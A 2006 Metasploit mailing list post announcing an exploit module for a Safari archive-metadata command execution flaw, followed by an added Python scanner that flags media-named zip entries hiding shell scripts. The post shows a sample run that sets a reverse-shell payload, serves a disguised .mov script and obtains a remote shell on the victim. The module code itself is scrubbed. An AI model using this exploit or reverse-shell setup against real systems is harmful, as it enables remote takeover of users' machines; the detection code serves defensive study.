Metasploit mailing list archives
Safari Archive Metadata Command Execution
From: hdm at metasploit.com (H D Moore)
Date: Wed, 22 Feb 2006 01:12:36 -0600
Hello,

Attached is a beta module for the Safari vulnerability announced today. The module depends on the 'zip' utility being in your path (MSFCygwin users should already have this installed). To use, load the module, select a payload, and then browse to the web service with a vulnerable version of Safari. It should automatically open the zip file and execute the shell script containing the payload.

Please mail me offlist if you encounter problems with this module.

Thanks!

-HD

-- sample run --

msf > use safari_safefiles_exec
msf safari_safefiles_exec(cmd_re) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf safari_safefiles_exec(cmd_unix_reverse) > set LHOST 192.168.0.100
LHOST -> 192.168.0.100
msf safari_safefiles_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321
msf safari_safefiles_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.100:8080/
  adding: LR6E45uoWshn3.mov (deflated 24%)
  adding: __MACOSX/._LR6E45uoWshn3.mov (deflated 87%)
[*] HTTP Client connected from ME:49381, sending 98 bytes of payload...
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.167:49393 192.168.0.100:4321 <-> 192.168.0.167:49392

id
uid=501(hdm) gid=501(hdm) groups=501(hdm), 79(appserverusr), 80(admin), 81 (appserveradm)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: safari_safefiles_exec.pm
Type: application/x-perl-module
Size: 13072 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060222/3d38b45a/attachment.bin>
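Added example, not part of the original post or of the attached module: a detection-side check for the archive layout visible in the sample run, where a zip carries a media-named file (.mov) that is really a shell script, alongside a __MACOSX/._ metadata entry. The function names, the extension list and the sample archive are constructed for illustration, and treating a "#!" prefix as the script indicator is an assumption.

```python
import io
import zipfile

# Extensions a browser might treat as passive media (illustrative list, an assumption).
MEDIA_EXTS = {".mov", ".mp4", ".mp3", ".jpg", ".gif", ".png", ".pdf"}
APPLEDOUBLE_MAGIC = b"\x00\x05\x16\x07"  # magic number of AppleDouble "._" sidecar files


def scan_zip(data: bytes):
    """Return [(entry_name, [reasons])] for media-named entries that are scripts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        for info in zf.infolist():
            name = info.filename
            if info.is_dir() or name.startswith("__MACOSX/"):
                continue
            dot = name.rfind(".")
            ext = name[dot:].lower() if dot != -1 else ""
            if ext not in MEDIA_EXTS:
                continue
            with zf.open(info) as fh:
                if fh.read(2) != b"#!":  # content matches no script header: skip
                    continue
            reasons = ["script shebang under media extension " + ext]
            # Metadata travels in __MACOSX/<dir>/._<basename> next to the data file.
            dirname, _, base = name.rpartition("/")
            sidecar = "__MACOSX/" + (dirname + "/" if dirname else "") + "._" + base
            if sidecar in names:
                with zf.open(sidecar) as fh:
                    if fh.read(4) == APPLEDOUBLE_MAGIC:
                        reasons.append("AppleDouble metadata sidecar: " + sidecar)
            findings.append((name, reasons))
    return findings


def build_sample() -> bytes:
    """Constructed, harmless archive: one mislabeled script, one benign media stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("clip.mov", "#!/bin/sh\necho constructed-sample\n")
        zf.writestr("__MACOSX/._clip.mov", APPLEDOUBLE_MAGIC + b"\x00" * 22)
        zf.writestr("real.mov", b"\x00\x00\x00\x14ftypqt  " + b"\x00" * 8)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip(build_sample()):
        print(name, "->", "; ".join(reasons))
```

Run against downloaded archives at a proxy or mail gateway, a hit on both reasons for the same entry is the combination shown in the sample run's "adding:" lines.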